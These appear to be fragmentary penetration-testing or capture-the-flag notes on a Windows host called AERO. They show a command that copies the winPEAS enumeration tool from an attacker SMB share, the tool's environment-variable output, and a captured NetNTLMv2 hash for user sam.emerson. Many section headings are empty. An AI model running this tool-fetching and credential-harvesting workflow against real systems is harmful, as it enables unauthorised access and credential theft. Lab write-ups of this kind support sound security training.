PEAS
ps c:\Users\sam.emerson\Downloads> copy \\10.10.14.4\test\winPEASx64.exe .
Delivery complete over the existing SMB
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: AERO
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\sam.emerson
LOCALAPPDATA: C:\Users\sam.emerson\AppData\Local
PSModulePath: C:\Users\sam.emerson\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\sam.emerson\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 23
LOGONSERVER: \\AERO
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
HOMEDRIVE: C:
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\sam.emerson
APPDATA: C:\Users\sam.emerson\AppData\Roaming
PROCESSOR_REVISION: 3100
USERNAME: sam.emerson
CommonProgramW6432: C:\Program Files\Common Files
OneDrive: C:\Users\sam.emerson\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: AERO
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\SAM~1.EME\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\SAM~1.EME\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: AERO
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100

LAPS

LSA Protection

Credentials Guard

Cached Creds

AV

UAC

PowerShell

.NET Versions

NTLM

sam.emerson::AERO:1122334455667788:5c2ebaa52dc32594ce5a66646be17a81:010100000000000044625cbe6e48da019aeda074cbf77f7d000000000800300030000000000000000000000000200000d3bc9e32dd95b435e864ffcc4137a71d73566e84b003f651c986ce3585d0cd080a00100000000000000000000000000000000000090000000000000000000000
Token Privileges (sam.emerson)

Logged Users

RDP Session

Modifiable Services

Active Window

Installed Programs

Scheduled Tasks
Initially discovered and enumerated
SMB

Stored Creds

Networks

Firewall

Office365 Endpoints by OneDrive

Interesting Files
